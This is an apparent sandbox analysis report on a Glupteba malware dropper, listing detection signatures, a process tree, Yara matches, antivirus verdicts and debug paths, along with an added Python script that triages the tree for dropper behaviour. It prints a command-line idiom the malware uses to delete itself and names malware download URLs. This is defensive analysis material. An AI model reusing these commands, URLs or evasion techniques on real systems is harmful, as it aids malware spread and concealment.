

Analysis Report SecuriteInfo.com.Generic.mg.cf35edde149e46ee.15941

Overview

General Information

Sample Name: SecuriteInfo.com.Generic.mg.cf35edde149e46ee.15941 (renamed file extension from 15941 to exe)
Analysis ID: 352870
MD5: cf35edde149e46ee5dcafa4151dd4a81
SHA1: bd920d23e20dd55fce50c1a4cb6294a65d3fd5d9
SHA256: 576c0f0c427bc26f4f32211bb46a7430085cc5dda994f3c1829921d41236cb09


Detection

Glupteba
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Glupteba
.NET source code contains potential unpacker
Binary contains a suspicious time stamp
Creates multiple autostart registry keys
Found Tor onion address
Machine Learning detection for dropped file
Machine Learning detection for sample
May modify the system service descriptor table (often done to hook functions)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Antivirus or Machine Learning detection for unpacked file
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locale information (e.g. system language)
Contains functionality to query network adapter information
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Is looking for software installed on the system
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
PE file contains strange resources
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Terminates after testing mutex exists (may check infected machine status)
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • svchost.exe (PID: 616 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe (PID: 3496 cmdline: 'C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe' MD5: CF35EDDE149E46EE5DCAFA4151DD4A81)
    • multitimer.exe (PID: 1692 cmdline: 'C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe' 0 30601988b56f78c9.53290271 0 102 MD5: E252EF40FF9D0A528918215DB75A8EB9)
      • multitimer.exe (PID: 3524 cmdline: 'C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe' 1 3.1613346908.6029b85c957f5 MD5: E252EF40FF9D0A528918215DB75A8EB9)
        • multitimer.exe (PID: 6644 cmdline: 'C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe' 2 3.1613346908.6029b85c957f5 MD5: E252EF40FF9D0A528918215DB75A8EB9)
          • safebits.exe (PID: 5576 cmdline: 'C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe' /S /pubid=1 /subid=451 MD5: 7504A339516D6AB6F35C55CD96810040)
            • hh.exe (PID: 6300 cmdline: 'C:\windows\hh.exe' MD5: A50C9DF7603E2F1AEA6B54053794A326)
          • 2mqvpn30gyk.exe (PID: 6768 cmdline: 'C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exe' 57a764d042bf8 MD5: A0B220137332876ABC6DD8D91F2DD363)
            • cmd.exe (PID: 4484 cmdline: 'C:\Windows\System32\cmd.exe' /k 'C:\Program Files\89C8W4UQTF\89C8W4UQT.exe' 57a764d042bf8 & exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
              • conhost.exe (PID: 2212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
              • 89C8W4UQT.exe (PID: 5532 cmdline: 'C:\Program Files\89C8W4UQTF\89C8W4UQT.exe' 57a764d042bf8 MD5: 6195B97E8DCE6CE5E279A68E7BA4BE3F)
          • tpwlxkeo40z.exe (PID: 6420 cmdline: 'C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exe' testparams MD5: 83BD1D79670EF5335E6533AE8285AB22)
            • conhost.exe (PID: 5920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • vksqeekarkn.exe (PID: 5536 cmdline: 'C:\Users\user\AppData\Roaming\pwdfnyi4vax\vksqeekarkn.exe' /VERYSILENT /p=testparams MD5: 725F35103362F3F1410216F5ED785A1F)
          • AwesomePoolE1.exe (PID: 768 cmdline: 'C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe' MD5: 0E5F029EB6ECABF1E593E12211887506)
          • vkfgkd5pxm1.exe (PID: 1548 cmdline: 'C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe' MD5: 57664817E1CE6474C6FB8201675AC09E)
            • cmd.exe (PID: 5992 cmdline: cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q 'C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
              • conhost.exe (PID: 5540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • installer.exe (PID: 744 cmdline: 'C:\Users\user\AppData\Local\Temp\v01sxozeepn\installer.exe' /verysilent /cid=12 /subid=209 MD5: 57A499F8970931ED49142A0392846212)
          • app.exe (PID: 6452 cmdline: 'C:\Users\user\AppData\Local\Temp\zfocqbupv0l\app.exe' /8-23 MD5: CA391A385DA53FAE727E8B060FCB05C3)
          • AwesomePoolE1.exe (PID: 6456 cmdline: 'C:\Users\user\AppData\Local\Temp\amgjkax5nv1\AwesomePoolE1.exe' MD5: 0E5F029EB6ECABF1E593E12211887506)
          • vpn.exe (PID: 4904 cmdline: 'C:\Users\user\AppData\Local\Temp\3irwzwdz0tz\vpn.exe' /silent /subid=482 MD5: A9487E1960820EB2BA0019491D3B08CE)
          • installer.exe (PID: 6968 cmdline: 'C:\Users\user\AppData\Local\Temp\ych1rhrgxfs\installer.exe' /verysilent /cid=12 /subid=209 MD5: 57A499F8970931ED49142A0392846212)
          • g5qbddy2kmz.exe (PID: 2740 cmdline: 'C:\Users\user\AppData\Local\Temp\fi2zlo3hx4f\g5qbddy2kmz.exe' 57a764d042bf8 MD5: A0B220137332876ABC6DD8D91F2DD363)
          • safebits.exe (PID: 5956 cmdline: 'C:\Users\user\AppData\Local\Temp\ow1l0zgmgaf\safebits.exe' /S /pubid=1 /subid=451 MD5: 7504A339516D6AB6F35C55CD96810040)
            • hh.exe (PID: 4592 cmdline: 'C:\windows\hh.exe' MD5: A50C9DF7603E2F1AEA6B54053794A326)
          • uhmrme5g5sj.exe (PID: 6884 cmdline: 'C:\Users\user\AppData\Local\Temp\vwqpmvzrl2f\uhmrme5g5sj.exe' testparams MD5: 83BD1D79670EF5335E6533AE8285AB22)
            • conhost.exe (PID: 5436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • 5asqork1n2b.exe (PID: 2016 cmdline: 'C:\Users\user\AppData\Local\Temp\orsnadbtlac\5asqork1n2b.exe' MD5: 57664817E1CE6474C6FB8201675AC09E)
          • app.exe (PID: 6212 cmdline: 'C:\Users\user\AppData\Local\Temp\cec353i0agk\app.exe' /8-23 MD5: CA391A385DA53FAE727E8B060FCB05C3)
          • vpn.exe (PID: 5276 cmdline: 'C:\Users\user\AppData\Local\Temp\hfhc33nmvzc\vpn.exe' /silent /subid=482 MD5: A9487E1960820EB2BA0019491D3B08CE)
  • svchost.exe (PID: 7120 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • multitimer.exe (PID: 1844 cmdline: 'C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe' 1 3.1613346908.6029b85c957f5 MD5: E252EF40FF9D0A528918215DB75A8EB9)
    • multitimer.exe (PID: 204 cmdline: 'C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe' 2 3.1613346908.6029b85c957f5 MD5: E252EF40FF9D0A528918215DB75A8EB9)
  • svchost.exe (PID: 6744 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • multitimer.exe (PID: 3400 cmdline: 'C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe' 1 3.1613346908.6029b85c957f5 MD5: E252EF40FF9D0A528918215DB75A8EB9)
  • cleanup
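The Startup tree above is the most useful part of the report for a responder, because it shows the dropper chain: a .NET loader (multitimer.exe) running from %TEMP%, payloads re-dropped under random directory names, and a cmd.exe ping-then-del idiom that removes a dropped binary once it has run. The script below is an added example and is not part of the Joe Sandbox report or of the sample; SAMPLE_TREE is a constructed excerpt of the tree above (indentation kept as the report prints it), and the three heuristics it applies (execution from a user-writable directory, cmd.exe self-deletion of the parent image, one hash appearing under several paths) are the editor's own rules, not Joe Sandbox signatures.

```python
"""Triage a sandbox 'Startup' process tree for dropper behaviour."""
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional, Set, Tuple

# Constructed excerpt of this report's Startup tree (depth shown by indentation, as printed).
SAMPLE_TREE = r"""
  • SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe (PID: 3496 cmdline: 'C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe' MD5: CF35EDDE149E46EE5DCAFA4151DD4A81)
    • multitimer.exe (PID: 1692 cmdline: 'C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe' 0 30601988b56f78c9.53290271 0 102 MD5: E252EF40FF9D0A528918215DB75A8EB9)
      • vkfgkd5pxm1.exe (PID: 1548 cmdline: 'C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe' MD5: 57664817E1CE6474C6FB8201675AC09E)
        • cmd.exe (PID: 5992 cmdline: cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q 'C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 5540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • AwesomePoolE1.exe (PID: 768 cmdline: 'C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe' MD5: 0E5F029EB6ECABF1E593E12211887506)
      • AwesomePoolE1.exe (PID: 6456 cmdline: 'C:\Users\user\AppData\Local\Temp\amgjkax5nv1\AwesomePoolE1.exe' MD5: 0E5F029EB6ECABF1E593E12211887506)
"""

LINE_RE = re.compile(r"^( *)• (\S+) \(PID: (\d+) cmdline: (.*) MD5: ([0-9A-Fa-f]{32})\)$")

# Directories an unprivileged user can write to; a PE executing from here is a drop, not an install.
USER_WRITABLE = ("\\appdata\\local\\temp\\", "\\appdata\\roaming\\",
                 "\\programdata\\", "\\users\\public\\")
# cmd.exe "ping <host> -n 1 -w N > Nul & Del /f /q <file>": sleep-then-delete idiom droppers
# use to remove themselves once the payload is running (editor's heuristic).
SELF_DELETE_RE = re.compile(r"\bping\b.*&\s*del\b", re.IGNORECASE)


@dataclass
class Proc:
    name: str
    pid: int
    cmdline: str
    md5: str
    depth: int
    parent: Optional[int] = None


def image_path(cmdline: str) -> str:
    """First token of the command line, honouring the single quotes the report prints."""
    if cmdline.startswith("'"):
        return cmdline[1:cmdline.index("'", 1)]
    return cmdline.split(" ", 1)[0]


def parse_tree(text: str) -> List[Proc]:
    """Rebuild parent/child links from the indentation of the bullet list."""
    procs: List[Proc] = []
    stack: List[Proc] = []  # ancestors of the line currently being parsed
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        indent, name, pid, cmdline, md5 = m.groups()
        depth = len(indent) // 2
        while stack and stack[-1].depth >= depth:
            stack.pop()
        proc = Proc(name, int(pid), cmdline, md5.upper(), depth,
                    stack[-1].pid if stack else None)
        procs.append(proc)
        stack.append(proc)
    return procs


def triage(text: str) -> List[Tuple[str, int, str]]:
    """Return (rule, pid, detail) findings over the whole tree."""
    procs = parse_tree(text)
    by_pid: Dict[int, Proc] = {p.pid: p for p in procs}
    hits_by_md5: Dict[str, Set[Tuple[str, int]]] = defaultdict(set)
    findings: List[Tuple[str, int, str]] = []
    for p in procs:
        path = image_path(p.cmdline)
        hits_by_md5[p.md5].add((path.lower(), p.pid))
        if any(marker in path.lower() for marker in USER_WRITABLE):
            findings.append(("exec_from_user_writable", p.pid, path))
        if p.name.lower() == "cmd.exe" and SELF_DELETE_RE.search(p.cmdline):
            parent = by_pid.get(p.parent) if p.parent is not None else None
            detail = "target is not the parent image"
            if parent and image_path(parent.cmdline).lower() in p.cmdline.lower():
                detail = f"deletes parent PID {parent.pid} ({parent.name})"
            findings.append(("self_delete_via_ping", p.pid, detail))
    # The same binary dropped under several random directory names is a loader re-running
    # its payload; per-file AV verdicts will count these as separate samples.
    for md5, hits in hits_by_md5.items():
        if len({path for path, _ in hits}) > 1:
            for _, pid in sorted(hits, key=lambda h: h[1]):
                findings.append(("same_hash_multiple_paths", pid, md5))
    return findings


if __name__ == "__main__":
    for rule, pid, detail in triage(SAMPLE_TREE):
        print(f"{rule:26} pid={pid:<5} {detail}")
```

The parent link matters for the self-delete rule: the cmd.exe line on its own only shows a ping and a Del, and it is the match against the parent's image path that turns it into "vkfgkd5pxm1.exe removed itself after running". On the full tree the same rules also flag safebits.exe, installer.exe, app.exe and vpn.exe, each dropped twice under different random directories.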

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
0000001C.00000002.867034664.00000000038B0000.00000040.00000001.sdmp | JoeSecurity_Glupteba | Yara detected Glupteba | Joe Security
00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp | JoeSecurity_Glupteba | Yara detected Glupteba | Joe Security
0000001C.00000002.841596778.0000000000400000.00000040.00020000.sdmp | JoeSecurity_Glupteba | Yara detected Glupteba | Joe Security
00000013.00000002.866048884.0000000003790000.00000040.00000001.sdmp | JoeSecurity_Glupteba | Yara detected Glupteba | Joe Security
0000001C.00000003.801918341.00000000040C0000.00000004.00000001.sdmp | JoeSecurity_Glupteba | Yara detected Glupteba | Joe Security
(2 further entries not shown)

            Unpacked PEs

Source | Rule | Description | Author | Strings
19.2.app.exe.3d72670.6.raw.unpack | MAL_ME_RawDisk_Agent_Jan20_2 | Detects suspicious malware using ElRawDisk | Florian Roth
  • 0x43598:$s2: The Magic Word!
  • 0x4f6d8:$s2: The Magic Word!
  • 0x438f8:$s3: Software\Oracle\VirtualBox
  • 0x43587:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
19.3.app.exe.45853c0.0.raw.unpack | MAL_ME_RawDisk_Agent_Jan20_2 | Detects suspicious malware using ElRawDisk | Florian Roth
  • 0x3f9f8:$s2: The Magic Word!
  • 0x4bb38:$s2: The Magic Word!
  • 0x3fd58:$s3: Software\Oracle\VirtualBox
  • 0x3f9e7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
19.3.app.exe.4587620.1.raw.unpack | MAL_ME_RawDisk_Agent_Jan20_2 | Detects suspicious malware using ElRawDisk | Florian Roth
  • 0x3d798:$s2: The Magic Word!
  • 0x498d8:$s2: The Magic Word!
  • 0x3daf8:$s3: Software\Oracle\VirtualBox
  • 0x3d787:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
19.2.app.exe.9e63c0.3.raw.unpack | MAL_ME_RawDisk_Agent_Jan20_2 | Detects suspicious malware using ElRawDisk | Florian Roth
  • 0x3f9f8:$s2: The Magic Word!
  • 0x4bb38:$s2: The Magic Word!
  • 0x3fd58:$s3: Software\Oracle\VirtualBox
  • 0x3f9e7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
19.2.app.exe.3d76210.7.raw.unpack | MAL_ME_RawDisk_Agent_Jan20_2 | Detects suspicious malware using ElRawDisk | Florian Roth
  • 0x3f9f8:$s2: The Magic Word!
  • 0x4bb38:$s2: The Magic Word!
  • 0x3fd58:$s3: Software\Oracle\VirtualBox
  • 0x3f9e7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
(9 further entries not shown)

Note on the matched strings: $sc1 is the UTF-16LE encoding of \\.\%s, the device-path format string used to open a raw disk or driver handle, and $s3 is the VirtualBox registry key, consistent with the VM-detection signatures listed above. The rule fires on app.exe only, which is the process the Glupteba Yara rule also hits.

            Sigma Overview

System Summary:

Sigma detected: Failed Code Integrity Checks
Source: Event Logs | Author: Thomas Patzke | Data: EventID: 5038, Source: Microsoft-Windows-Security-Auditing, data 0: \Device\HarddiskVolume4\Windows\System32\drivers\Winmon.sys

            Signature Overview


AV Detection:

Antivirus detection for URL or domain
Source: http://nvidsame.com/app/app.exe | Avira URL Cloud: Label: malware
Source: http://newscommer.com/app/app.exe | Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\orsnadbtlac\5asqork1n2b.exe | Avira: detection malicious, Label: HEUR/AGEN.1138963
Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exe | Avira: detection malicious, Label: HEUR/AGEN.1133205
Source: C:\Users\user\AppData\Local\Temp\0g3fd4syqs1\AwesomePoolE1.exe | Avira: detection malicious, Label: HEUR/AGEN.1139468
Source: C:\Users\user\AppData\Local\Temp\fi2zlo3hx4f\g5qbddy2kmz.exe | Avira: detection malicious, Label: HEUR/AGEN.1133205
Source: C:\Program Files\89C8W4UQTF\uninstaller.exe | Avira: detection malicious, Label: HEUR/AGEN.1133205
Source: C:\Program Files\89C8W4UQTF\89C8W4UQT.exe | Avira: detection malicious, Label: HEUR/AGEN.1133205
Source: C:\Users\user\AppData\Local\Temp\qhmeucfqke0\AwesomePoolE1.exe | Avira: detection malicious, Label: HEUR/AGEN.1139468
Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe | Avira: detection malicious, Label: HEUR/AGEN.1138963
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\0g3fd4syqs1\AwesomePoolE1.exe | Metadefender: Detection: 29%
Source: C:\Users\user\AppData\Local\Temp\0g3fd4syqs1\AwesomePoolE1.exe | ReversingLabs: Detection: 82%
Source: C:\Users\user\AppData\Local\Temp\2vze2wqfnvj\installer.exe | ReversingLabs: Detection: 64%
Source: C:\Users\user\AppData\Local\Temp\4sgbvongjvu\AwesomePoolE1.exe | Metadefender: Detection: 29%
Source: C:\Users\user\AppData\Local\Temp\4sgbvongjvu\AwesomePoolE1.exe | ReversingLabs: Detection: 82%
Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe | ReversingLabs: Detection: 27%
Source: C:\Users\user\AppData\Local\Temp\amgjkax5nv1\AwesomePoolE1.exe | Metadefender: Detection: 29%
Source: C:\Users\user\AppData\Local\Temp\amgjkax5nv1\AwesomePoolE1.exe | ReversingLabs: Detection: 82%
Multi AV Scanner detection for submitted file
Source: SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe | Virustotal: Detection: 31%
Source: SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe | ReversingLabs: Detection: 27%
Yara detected Glupteba
Source: Yara match | File source: 0000001C.00000002.867034664.00000000038B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001C.00000002.841596778.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.866048884.0000000003790000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001C.00000003.801918341.00000000040C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000003.801926180.0000000003FA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: app.exe PID: 6452, type: MEMORY
Source: Yara match | File source: 19.2.app.exe.3790e50.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.2.app.exe.3790e50.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.3.app.exe.3fa0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.2.app.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.2.app.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.3.app.exe.3fa0000.3.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\orsnadbtlac\5asqork1n2b.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\cec353i0agk\app.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\fi2zlo3hx4f\g5qbddy2kmz.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe | Joe Sandbox ML: detected
Source: C:\Program Files\89C8W4UQTF\uninstaller.exe | Joe Sandbox ML: detected
Source: C:\Program Files\89C8W4UQTF\89C8W4UQT.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe | Joe Sandbox ML: detected
Machine Learning detection for sample
Source: SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe | Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 13.2.safebits.exe.3660000.8.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 13.2.safebits.exe.400000.0.unpack | Avira: Label: TR/Crypt.EPACK.Gen2

Bitcoin Miner:

Yara detected Glupteba
Source: Yara match | File source: 0000001C.00000002.867034664.00000000038B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001C.00000002.841596778.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.866048884.0000000003790000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001C.00000003.801918341.00000000040C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000003.801926180.0000000003FA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: app.exe PID: 6452, type: MEMORY
Source: Yara match | File source: 19.2.app.exe.3790e50.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.2.app.exe.3790e50.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.3.app.exe.3fa0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.2.app.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.2.app.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.3.app.exe.3fa0000.3.unpack, type: UNPACKEDPE

Compliance:

Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe | Unpacked PE file: 1.2.SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe.880000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe | Unpacked PE file: 2.2.multitimer.exe.470000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe | Unpacked PE file: 3.2.multitimer.exe.60000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe | Unpacked PE file: 8.2.multitimer.exe.e10000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe | Unpacked PE file: 13.2.safebits.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\zfocqbupv0l\app.exe | Unpacked PE file: 19.2.app.exe.400000.0.unpack
Creates a directory in C:\Program Files
Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exe | Directory created: C:\Program Files\89C8W4UQTF
Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exe | Directory created: C:\Program Files\89C8W4UQTF\89C8W4UQT.exe
Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exe | Directory created: C:\Program Files\89C8W4UQTF\89C8W4UQT.exe.config
Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exe | Directory created: C:\Program Files\89C8W4UQTF\uninstaller.exe
Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exe | Directory created: C:\Program Files\89C8W4UQTF\uninstaller.exe.config
Creates a software uninstall entry
Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe | Registry value created: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\{4864a531-7c66-4f8b-8bca-339fdcb93393}
Uses new MSVCR Dlls
Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe | File opened: C:\Windows\WinSxS\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_88df21dd2faf7c49\MSVCR80.dll
Contains modern PE file flags such as dynamic base (ASLR) or NX
Source: SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Binary contains paths to debug symbols
            Source: Binary string: C:\Users\wizzlabs\source\repos\PopUnder\PopUnder\obj\Release\SiZebiLin.pdbw) source: tpwlxkeo40z.exe, 0000000F.00000000.724251441.00000000003A2000.00000002.00020000.sdmp
            Source: Binary string: C:\Users\wizzlabs\source\repos\PopUnder\PopUnder\obj\Release\SiZebiLin.pdb source: tpwlxkeo40z.exe
            Source: Binary string: C:\Users\Admin\source\repos\driver-process-monitor\Release\WinmonProcessMonitor.pdb source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: Unrecognized pdb formatThis error indicates attempting to access a .pdb file with source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: A connection with the server could not be establishedAn extended error was returned from the WinHttp serverThe .pdb file is probably no longer indexed in the symbol server share location. source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: Age does not matchThe module age and .pdb age do not match. source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: C:\Users\wizzlabs\source\repos\Castoura\Castoura\obj\Release\WiccPower.pdb source: 2mqvpn30gyk.exe
            Source: Binary string: symsrv.pdb source: app.exe, 00000013.00000002.852052823.0000000000B9F000.00000040.00020000.sdmp
            Source: Binary string: Cvinfo is corruptThe .pdb file contains a corrupted debug codeview information. source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: \\Mac\Home\Documents\Workspace\Wizzlabs\windows\Newtonsoft.Json\obj\Release\Newtonsoft.Json.pdb source: multitimer.exe, 00000002.00000002.669955444.000000001B530000.00000004.00000001.sdmp, multitimer.exe, 00000003.00000002.683380716.00000000127CB000.00000004.00000001.sdmp, multitimer.exe, 00000008.00000002.802510935.000000001BD90000.00000004.00000001.sdmp
            Source: Binary string: C:\Users\wizzlabs\source\repos\Castoura\Castoura\obj\Release\WiccPower.pdbcE source: 2mqvpn30gyk.exe, 0000000E.00000002.764745587.000000000266E000.00000004.00000001.sdmp
            Source: Binary string: Downloading symbols for [%s] %ssrv*symsrv*http://https://_bad_pdb_file.pdb source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win7x64\x64\Release\SSDTHook.pdb source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: The symbol server has never indexed any version of this symbol fileNo version of the .pdb file with the given name has ever been registered. source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: mscorrc.pdb source: multitimer.exe, 00000002.00000002.668297568.0000000000CC0000.00000002.00000001.sdmp, multitimer.exe, 00000003.00000002.681530464.0000000000990000.00000002.00000001.sdmp, multitimer.exe, 00000008.00000002.723019042.0000000003110000.00000002.00000001.sdmp
            Source: Binary string: PDB not foundUnable to locate the .pdb file in any of the symbol search path locations. source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
